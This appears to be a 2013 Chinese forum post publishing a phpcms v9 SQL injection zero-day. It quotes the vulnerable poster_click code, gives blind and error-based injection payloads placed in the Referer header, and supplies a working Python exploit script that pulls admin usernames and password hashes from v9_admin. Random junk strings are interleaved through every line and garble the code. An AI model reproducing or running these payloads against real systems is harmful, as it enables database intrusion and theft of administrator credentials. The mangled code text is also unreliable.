有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:; W8 k* j9 H+ V/ T! \
+ ]' k7 W( O( n% v' W问题函数\phpcms\modules\poster\index.php
9 F$ `6 E. t% H- ]" v0 g* t* B; B- T7 M& M: I; }/ X. ]
public function poster_click() {
% I: Y0 z. x2 ^: T$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
3 K0 J7 @" H5 P$r = $this->db->get_one(array('id'=>$id));+ g5 q# {& \( s G7 m5 x# i/ b/ C
if (!is_array($r) && empty($r)) return false; W1 P% m) \. }2 y5 M, b5 C( l, P5 V6 O
$ip_area = pc_base::load_sys_class('ip_area');
& u) j; S! U' _$ N7 T$ip = ip();" R( [; U) Z( \( q
$area = $ip_area->get($ip);
4 f( L# N; H' L3 C, Z2 F' R$username = param::get_cookie('username') ? param::get_cookie('username') : '';* J3 E8 [- `/ ?' l8 }! l+ c
if($id) {/ P% S' o2 u, a9 R3 s
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();3 L1 u* e6 R( V6 N9 L+ i
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));( g% z0 ]( `5 T7 m `7 ~8 l: G
}
$ T* f3 Q8 {' s- b% t$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));- L4 c( q% b8 D8 `9 B
$setting = string2array($r['setting']);
. K F# Y5 X$ @% ^if (count($setting)==1) {
& c8 J+ I2 I( M$url = $setting['1']['linkurl'];
* M! J# d: b9 E+ M} else {
( P! l! i& v) g4 `$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];) _5 V' Q& |4 a5 m5 C
}8 Y4 O7 s& \3 O# N
header('Location: '.$url);
8 v! X# P# ^! h, b}
% A. P& x+ _7 o1 U% |; O& z% Z( o6 n, ~' B! j) Z" |& z3 x- n/ R
8 v0 [7 U' p+ D- e7 u
4 q0 ?1 {. z6 @2 C利用方式:
6 Y) D U0 N8 V6 P' E" e8 i8 z; j/ `+ V, l9 _# R( H
1、可以采用盲注入的手法:
6 \. `+ Y) |0 e' M; a: |' }" G' q. u0 J3 d9 E5 u: I5 ]
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
. Y. j# F8 Y0 ?- z- ~; e* a
- ^/ P$ B5 ~# m1 l# @5 ~( K通过返回页面,正常与否一个个猜解密码字段。
/ \% d& E" o* q2 O9 z1 w7 r3 x7 x+ O
2、代码是花开写的,随手附上了:$ n8 A" a* j( j0 h7 h
* w, C3 H' X @; G2 _1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
; U# G" S- ^0 n2 B2 J& j
P- G3 l+ r5 X6 J此方法是爆错注入手法,原理自查。; @2 J- T2 ^6 \1 E
2 W( l; n. g+ `# f6 }* w
/ K8 [4 m( a/ V7 g# Q) A0 G4 P9 H1 I# P( K) t/ l1 N
利用程序:
4 n1 f! z- d a
3 r# x& P4 `6 N) j! E#!/usr/bin/env python# z! A+ S5 u; w
import httplib,sys,re4 O( M; n! L% o0 h
3 D D8 `" ^! `" y( e9 A$ |
def attack():2 w+ i$ c5 y1 W# ^
print “Code by Pax.Mac Team conqu3r!”- j5 F8 N T* M% s
print “Welcome to our zone!!!”
6 V G/ A4 p* E. W/ a/ Q; Ourl=sys.argv[1]* }. r1 r3 J/ ~- F# B. i4 C2 R
paths=sys.argv[2]
( U2 q' r @: N& E) s5 sconn = httplib.HTTPConnection(url)
2 S, Q/ }: c3 B% \ Ui_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,6 w5 R/ U' k$ [* Z8 z' D
“Accept”: “text/plain”,2 F# {3 p0 o6 B+ C0 a' u* G
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}/ w1 r# w N, q
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
7 ~5 Q1 B R# ~; ]' [5 H0 }r1 = conn.getresponse(). S0 D! V/ F2 ]7 z [
datas=r1.read()2 s+ z# M# _* q
datas=re.findall(r”Duplicate entry \’\w+’”, datas)0 P' C$ }. u# l
print datas[0]; S4 p. m5 w. ?9 }8 r
conn.close()% W# l0 g# D9 k0 H/ O, G
if __name__==”__main__”:1 z$ i* H; f! [! k' ]7 j5 D
if len(sys.argv)<3:
' G9 b1 w3 Q- y6 W) ~$ ^print “Code by Pax.Mac Team conqu3r”
( ?, o; o& S/ l; h" }' z. yprint “Usgae:”
$ Z$ ?" K; {+ s0 x. Bprint “ phpcmsattack.py www.paxmac.org /”' n1 z/ ] T% ?. S8 m( d: y! G
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
- X0 N* [' V& ?+ i- Q( E6 y5 c& wsys.exit(1)* S% T( S5 p7 R6 l1 N; D
attack()+ d5 n; {' L8 u, W" O; A
0 v5 y/ P( Y" u; r |
发表于 2013-1-11 21:01:00
收藏
支持
反对